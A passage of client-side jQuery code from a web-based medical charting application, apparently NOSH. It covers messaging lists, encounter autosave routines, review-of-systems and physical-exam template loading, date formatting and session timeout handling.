"sidx=date&sord=desc&rows=1000000&page=1", dataType: 'json' }).then(function(response) { if (type == 'internal_inbox') { var col = ['message-id','message-to','read','date','message-from','message-from-label','subject','body','cc','pid','patient_name','bodytext','t-messages-id','documents-id']; } if (type == 'internal_draft') { var col = ['message-id','date','message-to','cc','subject','body','pid','patient_name']; } if (type == 'internal_outbox') { var col = ['message-id','date','message-to','cc','subject','pid','body']; } var html = ''; if (response.rows != '') { $.each(response.rows, function ( i, item ) { var obj = {}; $.each(item.cell, function ( j, val ) { obj[col[j]] = val; }); if (type == 'internal_inbox') { var label = '<h3>' + obj['message-from-label'] + '</h3><p>' + obj['subject'] + '</p>'; } else { var label = '<h3>' + obj['message-to'] + '</h3><p>' + obj['subject'] + '</p>'; } var datastring = ''; $.each(obj, function ( key, value ) { datastring += 'data-nosh-' + key + '="' + value + '" '; }); html += '<li><a 
href="#" class="nosh_messaging_item" ' + datastring + ' data-origin="' + type + '">' + label + '</a></li>'; }); } $ul.html(html); $ul.listview("refresh"); $ul.trigger("updatelayout"); $.mobile.loading("hide"); }); } function chart_notification() { if (noshdata.group_id == '2') { $.ajax({ type: "POST", url: "ajaxchart/notification", dataType: "json", success: function(data){ if (data.appt != noshdata.notification_appt && data.appt != '') { $.jGrowl(data.appt, {sticky:true, header:data.appt_header}); noshdata.notification_appt = data.appt; } if (data.alert != noshdata.notification_alert && data.alert != '') { $.jGrowl(data.alert, {sticky:true, header:data.alert_header}); noshdata.notification_alert = data.alert; } } }); } } function openencounter() { $("#encounter_body").html(''); $("#encounter_body").empty(); if ($(".ros_dialog").hasClass('ui-dialog-content')) { $(".ros_dialog").dialog('destroy'); } if ($(".pe_dialog").hasClass('ui-dialog-content')) { $(".pe_dialog").dialog('destroy'); } $("#encounter_body").load('ajaxencounter/loadtemplate'); $('#dialog_load').dialog('option', 'title', "Loading encounter...").dialog('open'); $("#encounter_link_span").html('<a href="#" id="encounter_panel">[Active Encounter #: ' + noshdata.eid + ']</a>'); $.ajax({ type: "POST", url: "ajaxsearch/get-tags/eid/" + noshdata.eid, dataType: "json", success: function(data){ $("#encounter_tags").tagit("fill",data); } }); } function closeencounter() { var $hpi = $('#hpi_form'); console.log($hpi.length); if($hpi.length) { hpi_autosave('hpi'); } var $situation = $('#situation_form'); if($situation.length) { hpi_autosave('situation'); } var $oh = $('#oh_form'); if($oh.length) { oh_autosave(); } var $vitals = $('#vitals_form'); if($vitals.length) { vitals_autosave(); } var $proc = $('#procedure_form'); if($proc.length) { proc_autosave(); } var $assessment = $('#assessment_form'); if($assessment.length) { assessment_autosave(); } var $orders = $('#orders_form'); if($orders.length) { orders_autosave(); } var $medications = $('#mtm_medications_form'); if($medications.length) { medications_autosave(); } $.ajax({ type: "POST", url: "ajaxchart/closeencounter", success: function(data){ noshdata.encounter_active = 'n'; $("#nosh_encounter_div").hide(); $("#nosh_chart_div").show(); $("#encounter_link_span").html(''); } }); } function signedlabel (cellvalue, options, rowObject){ if (cellvalue == 'No') { return 'Draft'; } if (cellvalue == 'Yes') { return 'Signed'; } } function loadbuttons() { $(".nosh_button").button(); $(".nosh_button_save").button({icons: {primary: "ui-icon-disk"}}); $(".nosh_button_cancel").button({icons: {primary: "ui-icon-close"}}); $(".nosh_button_delete").button({icons: {primary: "ui-icon-trash"}}); $(".nosh_button_calculator").button({icons: {primary: "ui-icon-calculator"}}); $(".nosh_button_check").button({icons: {primary: "ui-icon-check"}}); $(".nosh_button_preview").button({icons: {primary: "ui-icon-comment"}}); $(".nosh_button_edit").button({icons: {primary: "ui-icon-pencil"}}); $(".nosh_button_add").button({icons: {primary: "ui-icon-plus"}}); $(".nosh_button_print").button({icons: {primary: "ui-icon-print"}}); $(".nosh_button_alert").button({icons: {primary: "ui-icon-alert"}}); $(".nosh_button_copy").button({icons: {primary: "ui-icon-copy"}}); $(".nosh_button_extlink").button({icons: {primary: "ui-icon-extlink"}}); $(".nosh_button_reactivate").button({icons: {primary: "ui-icon-arrowreturnthick-1-w"}}); $(".nosh_button_reply").button({icons: {primary: "ui-icon-arrowreturn-1-w"}}); 
$(".nosh_button_forward").button({icons: {primary: "ui-icon-arrow-1-e"}}); $(".nosh_button_open").button({icons: {primary: "ui-icon-folder-open"}}); $(".nosh_button_calendar").button({icons: {primary: "ui-icon-calendar"}}); $(".nosh_button_cart").button({icons: {primary: "ui-icon-cart"}}); $(".nosh_button_image").button({icons: {primary: "ui-icon-image"}}); $(".nosh_button_star").button({icons: {primary: "ui-icon-star"}}); $(".nosh_button_script").button({icons: {primary: "ui-icon-script"}}); $(".nosh_button_next").button({text: false, icons: {primary: "ui-icon-seek-next"}}); $(".nosh_button_prev").button({text: false, icons: {primary: "ui-icon-seek-prev"}}); } function swipe(){ if(supportsTouch === true){ $('.textdump').swipe({ excludedElements:'button, input, select, a, .noSwipe', tap: function(){ $(this).swipe('disable'); $(this).focus(); $(this).on('focusout', function() { $(this).swipe('enable'); }); }, swipeRight: function(){ var elem = $(this); textdump(elem); } }); $('.textdump_text').text('Swipe right'); $('#swipe').show(); } else { $('.textdump_text').text('Click shift-right arrow key'); $('#swipe').hide(); } } function menu_update(type) { $.ajax({ type: "POST", url: "ajaxchart/" + type + "-list", success: function(data){ $("#menu_accordion_" + type + "-list_content").html(data); $("#menu_accordion_" + type + "-list_load").hide(); } }); } function remove_text(parent_id_entry, a, label_text, ret) { var old = $("#" + parent_id_entry).val(); var old_arr = old.split(' '); if (label_text != '') { var new_arr = search_array(old_arr, label_text); } else { var new_arr = []; } if (new_arr.length > 0) { var arr_index = old_arr.indexOf(new_arr[0]); a = a.replace(label_text, ''); old_arr[arr_index] = old_arr[arr_index].replace(label_text, ''); var old_arr1 = old_arr[arr_index].split('; ') var new_arr1 = search_array(old_arr1, a); if (new_arr1.length > 0) { var arr_index1 = old_arr1.indexOf(new_arr1[0]); old_arr1.splice(arr_index1,1); if (old_arr1.length > 0) { old_arr[arr_index] = label_text + old_arr1.join('; '); } else { old_arr.splice(arr_index,1); } } } else { var new_arr2 = search_array(old_arr, a); if (new_arr2.length > 0) { var arr_index2 = old_arr.indexOf(new_arr2[0]); old_arr.splice(arr_index2,1); } } var b = old_arr.join(" "); if (ret == true) { return b; } else { $("#" + parent_id_entry).val(b); } } function repeat_text(parent_id_entry, a, label_text) { var ret = false; var old = $("#" + parent_id_entry).val(); var old_arr = old.split(' '); if (label_text != '') { var new_arr = search_array(old_arr, label_text); } else { var new_arr = []; } if (new_arr.length > 0) { var arr_index = old_arr.indexOf(new_arr[0]); a = a.replace(label_text, ''); old_arr[arr_index] = old_arr[arr_index].replace(label_text, ''); var old_arr1 = old_arr[arr_index].split('; ') var new_arr1 = search_array(old_arr1, a); if (new_arr1.length > 0) { ret = true; } } else { var new_arr2 = search_array(old_arr, a); if (new_arr2.length > 0) { ret = true; } } return ret; } function refresh_documents() { $.ajax({ type: "POST", url: "ajaxsearch/documents-count", dataType: "json", success: function(data){ jQuery("#labs").jqGrid('setCaption', 'Labs: ' + data.labs_count); jQuery("#radiology").jqGrid('setCaption', 'Imaging: ' + data.radiology_count); jQuery("#cardiopulm").jqGrid('setCaption', 'Cardiopulmonary: ' + data.cardiopulm_count); jQuery("#endoscopy").jqGrid('setCaption', 'Endoscopy: ' + data.endoscopy_count); jQuery("#referrals").jqGrid('setCaption', 'Referrals: ' + data.referrals_count); 
jQuery("#past_records").jqGrid('setCaption', 'Past Records: ' + data.past_records_count); jQuery("#outside_forms").jqGrid('setCaption', 'Outside Forms: ' + data.outside_forms_count); jQuery("#letters").jqGrid('setCaption', 'Letters: ' + data.letters_count); } }); } function checkorders() { $.ajax({ type: "POST", url: "ajaxencounter/check-orders", dataType: "json", success: function(data){ $('#button_orders_labs_status').html(data.labs_status); $('#button_orders_rad_status').html(data.rad_status); $('#button_orders_cp_status').html(data.cp_status); $('#button_orders_ref_status').html(data.ref_status); $('#button_orders_rx_status').html(data.rx_status); $('#button_orders_imm_status').html(data.imm_status); $('#button_orders_sup_status').html(data.sup_status); } }); } function check_oh_status() { $.ajax({ type: "POST", url: "ajaxencounter/check-oh", dataType: "json", success: function(data){ $('#button_oh_sh_status').html(data.sh_status); $('#button_oh_etoh_status').html(data.etoh_status); $('#button_oh_tobacco_status').html(data.tobacco_status); $('#button_oh_drugs_status').html(data.drugs_status); $('#button_oh_employment_status').html(data.employment_status); $('#button_oh_meds_status').html(data.meds_status); $('#button_oh_supplements_status').html(data.supplements_status); $('#button_oh_allergies_status').html(data.allergies_status); $('#button_oh_psychosocial_status').html(data.psychosocial_status); $('#button_oh_developmental_status').html(data.developmental_status); $('#button_oh_medtrials_status').html(data.medtrials_status); } }); } function check_ros_status() { $.ajax({ type: "POST", url: "ajaxencounter/check-ros", dataType: "json", success: function(data){ $('#button_ros_gen_status').html(data.gen); $('#button_ros_eye_status').html(data.eye); $('#button_ros_ent_status').html(data.ent); $('#button_ros_resp_status').html(data.resp); $('#button_ros_cv_status').html(data.cv); $('#button_ros_gi_status').html(data.gi); $('#button_ros_gu_status').html(data.gu); $('#button_ros_mus_status').html(data.mus); $('#button_ros_neuro_status').html(data.neuro); $('#button_ros_psych_status').html(data.psych); $('#button_ros_heme_status').html(data.heme); $('#button_ros_endocrine_status').html(data.endocrine); $('#button_ros_skin_status').html(data.skin); $('#button_ros_wcc_status').html(data.wcc); $('#button_ros_psych1_status').html(data.psych1); $('#button_ros_psych2_status').html(data.psych2); $('#button_ros_psych3_status').html(data.psych3); $('#button_ros_psych4_status').html(data.psych4); $('#button_ros_psych5_status').html(data.psych5); $('#button_ros_psych6_status').html(data.psych6); $('#button_ros_psych7_status').html(data.psych7); $('#button_ros_psych8_status').html(data.psych8); $('#button_ros_psych9_status').html(data.psych9); $('#button_ros_psych10_status').html(data.psych10); $('#button_ros_psych11_status').html(data.psych11); } }); } function check_pe_status() { $.ajax({ type: "POST", url: "ajaxencounter/check-pe", dataType: "json", success: function(data){ $('#button_pe_gen_status').html(data.gen); $('#button_pe_eye_status').html(data.eye); $('#button_pe_ent_status').html(data.ent); $('#button_pe_neck_status').html(data.neck); $('#button_pe_resp_status').html(data.resp); $('#button_pe_cv_status').html(data.cv); $('#button_pe_ch_status').html(data.ch); $('#button_pe_gi_status').html(data.gi); $('#button_pe_gu_status').html(data.gu); $('#button_pe_lymph_status').html(data.lymph); $('#button_pe_ms_status').html(data.ms); $('#button_pe_neuro_status').html(data.neuro); 
$('#button_pe_psych_status').html(data.psych); $('#button_pe_skin_status').html(data.skin); $('#button_pe_constitutional_status').html(data.constitutional); $('#button_pe_mental_status').html(data.mental); } }); } function check_labs1() { $.ajax({ type: "POST", url: "ajaxencounter/check-labs", dataType: "json", success: function(data){ $('#button_labs_ua_status').html(data.ua); $('#button_labs_rapid_status').html(data.rapid); $('#button_labs_micro_status').html(data.micro); $('#button_labs_other_status').html(data.other); } }); } function total_balance() { if (noshdata.pid != '') { $.ajax({ type: "POST", url: "ajaxchart/total-balance", success: function(data){ $('#total_balance').html(data); } }); } } function hpi_autosave(type) { var old0 = $("#"+type+"_old").val(); var new0 = $("#"+type).val(); if (old0 != new0) { var str = encodeURIComponent(new0); $.ajax({ type: "POST", url: "ajaxencounter/hpi-save/" + type, data: type+'=' + str, success: function(data){ $.jGrowl(data); $("#"+type+"_old").val(new0); } }); } } function oh_autosave() { var bValid = false; $("#oh_form").find(".text").each(function() { if (bValid == false) { var input_id = $(this).attr('id'); var a = $("#" + input_id).val(); var b = $("#" + input_id + "_old").val(); if (a != b) { bValid = true; } } }); if (bValid) { var oh_str = $("#oh_form").serialize(); if(oh_str){ $.ajax({ type: "POST", url: "ajaxencounter/oh-save", data: oh_str, success: function(data){ $.jGrowl(data); $("#oh_form").find(".text").each(function() { var input_id = $(this).attr('id'); var a = $("#" + input_id).val(); $("#" + input_id + "_old").val(a); }); } }); } else { $.jGrowl("Please complete the form"); } } } function vitals_autosave() { var bValid = false; $("#vitals_form").find(".text").each(function() { if (bValid == false) { var input_id = $(this).attr('id'); var a = $("#" + input_id).val(); var b = $("#" + input_id + "_old").val(); if (a != b) { bValid = true; } } }); if (bValid) { var vitals_str = $("#vitals_form").serialize(); if(vitals_str){ $.ajax({ type: "POST", url: "ajaxencounter/vitals-save", data: vitals_str, success: function(data){ $.jGrowl(data); $("#vitals_form").find(".text").each(function() { var input_id = $(this).attr('id'); var a = $("#" + input_id).val(); $("#" + input_id + "_old").val(a); }); } }); } else { $.jGrowl("Please complete the form"); } } } function proc_autosave() { var bValid = false; $("#procedure_form").find(".text").each(function() { if (bValid == false) { var input_id = $(this).attr('id'); var a = $("#" + input_id).val(); var b = $("#" + input_id + "_old").val(); if (a != b) { bValid = true; } } }); if (bValid) { var proc_str = $("#procedure_form").serialize(); if(proc_str){ $.ajax({ type: "POST", url: "ajaxencounter/proc-save", data: proc_str, success: function(data){ $.jGrowl(data); $("#procedure_form").find(".text").each(function() { var input_id = $(this).attr('id'); var a = $("#" + input_id).val(); $("#" + input_id + "_old").val(a); }); } }); } else { $.jGrowl("Please complete the form"); } } } function assessment_autosave() { var bValid = false; $("#assessment_form").find(".text").each(function() { if (bValid == false) { var input_id = $(this).attr('id'); var a = $("#" + input_id).val(); var b = $("#" + input_id + "_old").val(); if (a != b) { bValid = true; } } }); if (bValid) { var assessment_str = $("#assessment_form").serialize(); if(assessment_str){ $.ajax({ type: "POST", url: "ajaxencounter/assessment-save", data: assessment_str, success: function(data){ $.jGrowl(data); 
$("#assessment_form").find(".text").each(function() { var input_id = $(this).attr('id'); var a = $("#" + input_id).val(); $("#" + input_id + "_old").val(a); }); $.ajax({ type: "POST", url: "ajaxencounter/get-billing", dataType: "json", success: function(data){ $("#billing_icd").removeOption(/./); $("#billing_icd").addOption(data, false); } }); } }); } else { $.jGrowl("Please complete the form"); } } } function orders_autosave() { var bValid = false; $("#orders_form").find(".text").each(function() { if (bValid == false) { var input_id = $(this).attr('id'); var a = $("#" + input_id).val(); var b = $("#" + input_id + "_old").val(); if (a != b) { bValid = true; } } }); if (bValid) { var orders_str = $("#orders_form").serialize(); if(orders_str){ $.ajax({ type: "POST", url: "ajaxencounter/orders-save", data: orders_str, success: function(data){ $.jGrowl(data); $("#orders_form").find(".text").each(function() { var input_id = $(this).attr('id'); var a = $("#" + input_id).val(); $("#" + input_id + "_old").val(a); }); } }); } else { $.jGrowl("Please complete the form"); } } } function medications_autosave() { $.ajax({ type: "POST", url: "ajaxencounter/oh-save1/meds", success: function(data){ $.jGrowl(data); } }); } function results_autosave() { var bValid = false; $("#oh_results_form").find(".text").each(function() { if (bValid == false) { var input_id = $(this).attr('id'); var a = $("#" + input_id).val(); var b = $("#" + input_id + "_old").val(); if (a != b) { bValid = true; } } }); if (bValid) { var oh_str = $("#oh_results_form").serialize(); if(oh_str){ $.ajax({ type: "POST", url: "ajaxencounter/oh-save1/results", data: oh_str, success: function(data){ $.jGrowl(data); $("#oh_results_form").find(".text").each(function() { var input_id = $(this).attr('id'); var a = $("#" + input_id).val(); $("#" + input_id + "_old").val(a); }); } }); } else { $.jGrowl("Please complete the form"); } } } function billing_autosave() { var bValid = false; $("#encounter_billing_form").find(".text").each(function() { if (bValid == false) { var input_id = $(this).attr('id'); var a = $("#" + input_id).val(); var b = $("#" + input_id + "_old").val(); if (a != b) { bValid = true; } } }); if (bValid) { var billing_str = $("#encounter_billing_form").serialize(); if(billing_str){ $.ajax({ type: "POST", url: "ajaxencounter/billing-save1", data: billing_str, success: function(data){ $.jGrowl(data); $("#encounter_billing_form").find(".text").each(function() { var input_id = $(this).attr('id'); var a = $("#" + input_id).val(); $("#" + input_id + "_old").val(a); }); } }); } else { $.jGrowl("Please complete the form"); } } } function pending_order_load(item) { $.ajax({ url: "ajaxchart/order-type/" + item, dataType: "json", type: "POST", success: function(data){ var label = data.label; var status = ""; var type = ""; if (label == 'messages_lab') { status = 'Details for Lab Order #' + item; type = 'lab'; } if (label == 'messages_rad') { status = 'Details for Radiology Order #' + item; type = 'rad'; } if (label == 'messages_cp') { status = 'Details for Cardiopulmonary Order #' + item; type = 'cp'; } load_outside_providers(type,'edit'); $.each(data, function(key, value){ if (key != 'label') { if (key == 'orders_pending_date') { var value = getCurrentDate(); } $("#edit_"+label+"_form :input[name='" + key + "']").val(value); } }); $("#"+label+"_status").html(status); if ($("#"+label+"_provider_list").val() == '' && noshdata.group_id == '2') { $("#"+label+"_provider_list").val(noshdata.user_id); } 
$("#"+label+"_edit_fields").dialog("option", "title", "Edit Lab Order"); $("#"+label+"_edit_fields").dialog('open'); } }); } function load_outside_providers(type,action) { $("#messages_"+type+"_location").removeOption(/./); var type1 = ''; var type2 = ''; if (type == 'lab') { type1 = 'Laboratory'; type2 = 'lab'; } if (type == 'rad') { type1 = 'Radiology'; type2 = 'imaging'; } if (type == 'cp') { type1 = 'Cardiopulmonary'; type2 = 'cardiopulmonary'; } $.ajax({ url: "ajaxsearch/orders-provider/" + type1, dataType: "json", type: "POST", async: false, success: function(data){ if(data.response == 'true'){ $("#messages_"+type+"_location").addOption({"":"Add "+type2+" provider."}, false); $("#messages_"+type+"_location").addOption(data.message, false); } else { $("#messages_"+type+"_location").addOption({"":"No "+type2+" provider. Click Add."}, false); } } }); $("#messages_"+type+"_provider_list").removeOption(/./); $.ajax({ url: "ajaxsearch/provider-select", dataType: "json", type: "POST", async: false, success: function(data){ $("#messages_"+type+"_provider_list").addOption({"":"Select a provider for the order."}, false); $("#messages_"+type+"_provider_list").addOption(data, false); if(action == 'add') { if (noshdata.group_id == '2') { $("#messages_"+type+"_provider_list").val(noshdata.user_id); } else { $("#messages_"+type+"_provider_list").val(''); } } } }); } function hpi_template_renew() { $("#hpi_template").removeOption(/./); $.ajax({ type: "POST", url: "ajaxencounter/hpi-template-select-list", dataType: "json", success: function(data){ $('#hpi_template').addOption({"":"*Select a template"}, false); $('#hpi_template').addOption(data.options, false); $('#hpi_template').sortOptions(); $('#hpi_template').val(""); } }); } function situation_template_renew() { $("#situation_template").removeOption(/./); $.ajax({ type: "POST", url: "ajaxencounter/situation-template-select-list", dataType: "json", success: function(data){ $('#situation_template').addOption({"":"*Select a template"}, false); $('#situation_template').addOption(data.options, false); $('#situation_template').sortOptions(); $('#situation_template').val(""); } }); } function referral_template_renew() { $("#messages_ref_template").removeOption(/./); $.ajax({ type: "POST", url: "ajaxchart/get-ref-templates-list", dataType: "json", success: function(data){ $('#messages_ref_template').addOption({"":"*Select a template"}, false); $('#messages_ref_template').addOption(data.options, false); $('#messages_ref_template').sortOptions(); } }); } function ros_form_load() { $('.ros_buttonset').buttonset(); $('.ros_detail_text').hide(); $("#ros_gu_menarche").datepicker(); $("#ros_gu_lmp").datepicker(); } function get_ros_templates(group, id, type) { $.ajax({ type: "POST", url: "ajaxencounter/get-ros-templates/" + group + "/" + id + "/" + type, dataType: "json", success: function(data){ $('#'+group+'_form').html(''); $('#'+group+'_form').dform(data); ros_form_load(); } }); } function ros_template_renew() { $.ajax({ type: "POST", url: "ajaxencounter/ros-template-select-list", dataType: "json", success: function(data){ $.each(data, function(key, value){ $('#'+key+'_template').removeOption(/./); $('#'+key+'_template').addOption({"":"*Select a template"}, false); $('#'+key+'_template').addOption(value, false); $('#'+key+'_template').sortOptions(); $('#'+key+'_template').val(""); }); } }); $.ajax({ type: "POST", url: "ajaxencounter/get-default-ros-templates", dataType: "json", success: function(data){ $.each(data, function(key, value){ 
$('#'+key+'_form').html(''); $('#'+key+'_form').dform(value); $("." + key + "_div").css("padding","5px"); $('.ros_template_div select').addOption({'':'Select option'},true); ros_form_load(); if (key == 'ros_wcc' && noshdata.agealldays <= 2191.44) { $.ajax({ type: "POST", url: "ajaxencounter/get-ros-wcc-template", dataType: "json", success: function(data){ $('#ros_wcc_age_form').html(''); $('#ros_wcc_age_form').dform(data); ros_form_load(); } }); } }); $('#dialog_load').dialog('close'); } }); } function ros_get_data() { $.ajax({ type: "POST", url: "ajaxencounter/get-ros", dataType: "json", success: function(data){ if (data && data != '') { $.each(data, function(key, value){ if (key != 'eid' || key != 'pid' || key != 'ros_date' || key != 'encounter_provider') { $('#'+key).val(value); $('#'+key+'_old').val(value); } }); } } }); } function ros_dialog_open() { if ($('#ros_skin_form').is(':empty')) { $('#dialog_load').dialog('option', 'title', "Loading templates...").dialog('open'); ros_template_renew(); } ros_get_data(); } function pe_form_load() { $('.pe_buttonset').buttonset(); $('.pe_detail_text').hide(); } function get_pe_templates(group, id, type) { $.ajax({ type: "POST", url: "ajaxencounter/get-pe-templates/" + group + "/" + id + "/" + type, dataType: "json", success: function(data){ $('#'+group+'_form').html(''); $('#'+group+'_form').dform(data); pe_form_load(); } }); } function pe_accordion_action(id, dialog_id) { $("#" + id + " .text").first().focus(); $("#"+dialog_id).find('.pe_entry').each(function(){ var parent_id1 = $(this).attr("id"); if (!!$(this).val()) { $('#' + parent_id1 + '_h').html(noshdata.item_present); } else { $('#' + parent_id1 + '_h').html(noshdata.item_empty); } }); } function pe_template_renew() { $.ajax({ type: "POST", url: "ajaxencounter/pe-template-select-list", dataType: "json", success: function(data){ $.each(data, function(key, value){ $('#'+key+'_template').removeOption(/./); $('#'+key+'_template').addOption({"":"*Select a template"}, false); $('#'+key+'_template').addOption(value, false); $('#'+key+'_template').sortOptions(); $('#'+key+'_template').val(""); }); } }); $.ajax({ type: "POST", url: "ajaxencounter/get-default-pe-templates", dataType: "json", success: function(data){ $.each(data, function(key, value){ $('#'+key+'_form').html(''); $('#'+key+'_form').dform(value); $("." 
+ key + "_div").css("padding","5px"); $('.pe_template_div select').addOption({'':'Select option'},true); pe_form_load(); }); $('#dialog_load').dialog('close'); } }); } function pe_get_data() { $.ajax({ type: "POST", url: "ajaxencounter/get-pe", dataType: "json", success: function(data){ if (data && data != '') { $.each(data, function(key, value){ if (key != 'eid' || key != 'pid' || key != 'pe_date' || key != 'encounter_provider') { $('#'+key).val(value); $('#'+key+'_old').val(value); if (!!value) { $('#' + key + '_h').html(noshdata.item_present); } else { $('#' + key + '_h').html(noshdata.item_empty); } } }); } } }); } function pe_dialog_open() { var bValid = false; $('.pe_dialog').each(function() { var dialog_id = $(this).attr('id'); var accordion_id = dialog_id.replace('_dialog', '_accordion'); if (!$("#"+accordion_id).hasClass('ui-accordion')) { $("#"+accordion_id).accordion({ create: function(event, ui) { var id = ui.panel[0].id; pe_accordion_action(id, dialog_id); }, activate: function(event, ui) { var id = ui.newPanel[0].id; pe_accordion_action(id, dialog_id); }, heightStyle: "content" }); bValid = true; } }); if (bValid == true) { $('#dialog_load').dialog('option', 'title', "Loading templates...").dialog('open'); pe_template_renew(); } pe_get_data(); } function pe_dialog_open1() { $('.pe_dialog').each(function() { var dialog_id = $(this).attr('id'); var accordion_id = dialog_id.replace('_dialog', '_accordion'); if (!$("#"+accordion_id).hasClass('ui-accordion')) { $("#"+accordion_id).accordion({ create: function(event, ui) { var id = ui.panel[0].id; pe_accordion_action(id, dialog_id); }, activate: function(event, ui) { var id = ui.newPanel[0].id; pe_accordion_action(id, dialog_id); }, heightStyle: "content" }); } }); pe_get_data(); } function parse_date(string) { var date = new Date(); var parts = String(string).split(/[- :]/); date.setFullYear(parts[0]); date.setMonth(parts[1] - 1); date.setDate(parts[2]); date.setHours(parts[3]); date.setMinutes(parts[4]); date.setSeconds(parts[5]); date.setMilliseconds(0); return date; } function parse_date1(string) { var date = new Date(); var parts = String(string).split("/"); date.setFullYear(parts[2]); date.setMonth(parts[0] - 1); date.setDate(parts[1]); date.setHours(0); date.setMinutes(0); date.setSeconds(0); date.setMilliseconds(0); return date; } function editDate(string) { var result = string.split("-"); var edit_date = result[1] + '/' + result[2] + '/' + result[0]; return edit_date; } function editDate1(string) { var result1 = string.split(" "); var result = result1[0].split("-"); var edit_date = result[1] + '/' + result[2] + '/' + result[0]; if (edit_date == '00/00/0000') { var edit_date1 = ''; } else { var edit_date1 = edit_date; } return edit_date1; } function editDate2(string) { var result1 = string.split(" "); var result = result1[1].split(":"); var hour1 = result[0]; var hour2 = parseInt(hour1); if (hour2 > 12) { var hour3 = hour2 - 12; var hour4 = hour3 + ''; var pm = 'PM'; if (hour4.length == 1) { var hour = "0" + hour4; } else { var hour = hour4; } } else { if (hour2 == 0) { var hour = '12'; var pm = 'AM'; } if (hour2 == 12) { var hour = hour2; var pm = 'PM'; } if (hour2 < 12) { var pm = 'AM'; if (hour2.length == 1) { var hour = "0" + hour2; } else { var hour = hour2; } } } var minute1 = result[1]; var minute2 = minute1 + ''; if (minute2.length == 1) { var minute = "0" + minute2; } else { var minute = minute2; } var time = hour + ":" + minute + ' ' + pm; return time; } function getCurrentDate() { var d = new Date(); var day1 = 
function getCurrentTime() {
	var d = new Date();
	var hour1 = d.getHours();
	var hour2 = parseInt(hour1);
	if (hour2 > 12) {
		var hour3 = hour2 - 12;
		var hour4 = hour3 + '';
		var pm = 'PM';
		if (hour4.length == 1) { var hour = "0" + hour4; } else { var hour = hour4; }
	} else if (hour2 == 0) {
		// midnight: the original fell through to the "< 12" branch and printed "0"
		var hour = '12';
		var pm = 'AM';
	} else if (hour2 == 12) {
		var hour = '12';
		var pm = 'PM';
	} else {
		var pm = 'AM';
		// pad via a string copy; the original tested .length on a number
		var hour5 = hour2 + '';
		if (hour5.length == 1) { var hour = "0" + hour5; } else { var hour = hour5; }
	}
	var minute1 = d.getMinutes();
	var minute2 = minute1 + '';
	if (minute2.length == 1) { var minute = "0" + minute2; } else { var minute = minute2; }
	var time = hour + ":" + minute + ' ' + pm;
	return time;
}

// jqGrid formatter for the encounter type column
function typelabel(cellvalue, options, rowObject) {
	if (cellvalue == 'standardmedical') { return 'Standard Medical Visit V1'; }
	if (cellvalue == 'standardmedical1') { return 'Standard Medical Visit V2'; }
	if (cellvalue == 'clinicalsupport') { return 'Clinical Support Visit'; }
	if (cellvalue == 'standardpsych') { return 'Annual Psychiatric Evaluation'; }
	if (cellvalue == 'standardpsych1') { return 'Psychiatric Encounter'; }
	if (cellvalue == 'standardmtm') { return 'MTM Encounter'; }
	// fall back to the raw value so unknown types don't render as "undefined"
	return cellvalue;
}

function t_messages_tags() {
	var id = $("#t_messages_id").val();
	$.ajax({
		type: "POST",
		url: "ajaxsearch/get-tags/t_messages_id/" + id,
		dataType: "json",
		success: function(data){
			$(".t_messages_tags").tagit("fill",data);
		}
	});
}

function refresh_timeline() {
	var $timeline_block = $('.cd-timeline-block');
	// hide timeline blocks which are outside the viewport
	$timeline_block.each(function(){
		if($(this).offset().top > $(window).scrollTop()+$(window).height()*0.75) {
			$(this).find('.cd-timeline-img, .cd-timeline-content').hide();
		}
	});
	// on scrolling, show/animate timeline blocks when they enter the viewport
	$(window).on('scroll', function(){
		$timeline_block.each(function(){
			if( $(this).offset().top <= $(window).scrollTop()+$(window).height()*0.75 && $(this).find('.cd-timeline-img').is(":hidden")) {
				$(this).find('.cd-timeline-img, .cd-timeline-content').show("slide");
			}
		});
	});
}

$.fn.clearForm = function() {
	return this.each(function() {
		var type = this.type, tag = this.tagName.toLowerCase();
		if (tag == 'form') { return $(':input',this).clearForm(); }
		if (type == 'text' || type == 'password' || type == 'hidden' || tag == 'textarea') {
			this.value = '';
			$(this).removeClass("ui-state-error");
		} else if (type == 'checkbox' || type == 'radio') {
			this.checked = false;
			$(this).removeClass("ui-state-error");
			$(this).checkboxradio('refresh');
		} else if (tag == 'select') {
			this.selectedIndex = 0;
			$(this).removeClass("ui-state-error");
			$(this).selectmenu('refresh');
		}
	});
};

$.fn.clearDiv = function() {
	return this.each(function() {
		var type = this.type, tag = this.tagName.toLowerCase();
		if (tag == 'div') { return $(':input',this).clearForm(); }
		if (type == 'text' || type == 'password' || type == 'hidden' || tag == 'textarea') {
			this.value = '';
			$(this).removeClass("ui-state-error");
		} else if (type == 'checkbox' || type == 'radio') {
			this.checked = false;
			$(this).removeClass("ui-state-error");
			$(this).checkboxradio('refresh');
		} else if (tag == 'select') {
			this.selectedIndex = 0;
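// jQuery UI selectmenu does not track programmatic changes,
// so the widget is refreshed right after the reset below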
$(this).removeClass("ui-state-error"); $(this).selectmenu('refresh'); } }); }; $.fn.serializeJSON = function() { var o = {}; var a = this.serializeArray(); $.each(a, function() { if (o[this.name] !== undefined) { if (!o[this.name].push) { o[this.name] = [o[this.name]]; } o[this.name].push(this.value || ''); } else { o[this.name] = this.value || ''; } }); return o; }; $.widget( "custom.catcomplete", $.ui.autocomplete, { _renderMenu: function( ul, items ) { var that = this, currentCategory = ""; $.each( items, function( index, item ) { if ( item.category != currentCategory ) { ul.append( "<li class='ui-autocomplete-category'>" + item.category + "</li>" ); currentCategory = item.category; } that._renderItemData( ul, item ); }); } }); $.ajaxSetup({ headers: {"cache-control":"no-cache"}, beforeSend: function(request) { return request.setRequestHeader("X-CSRF-Token", $("meta[name='token']").attr('content')); } }); $(document).ajaxError(function(event,xhr,options,exc) { if (xhr.status == "404" ) { alert("Route not found!"); //window.location.replace(noshdata.error); } else { if(xhr.responseText){ var response1 = $.parseJSON(xhr.responseText); var error = "Error:\nType: " + response1.error.type + "\nMessage: " + response1.error.message + "\nFile: " + response1.error.file; alert(error); } } }); $(document).idleTimeout({ inactivity: 3600000, noconfirm: 10000, alive_url: noshdata.error, redirect_url: noshdata.logout_url, logout_url: noshdata.logout_url, sessionAlive: false }); $(document).ready(function() { if ($("#provider_schedule1").length) { open_schedule(); } $('.cd-read-more').css('color', '#000000'); if ($('#internal_inbox').length) { open_messaging('internal_inbox'); } $(".headericon").offset({top: 23}); $(".headericon1").offset({top: 7}); if ($('.template_class').length) { var width = $('.template_class').width(); $('.template_class').wrap('<div class="template_class_wrap" style="position:relative;width:100%"></div>'); $('.template_class_wrap').append('<i class="template_click zmdi zmdi-favorite zmdi-hc-lg" 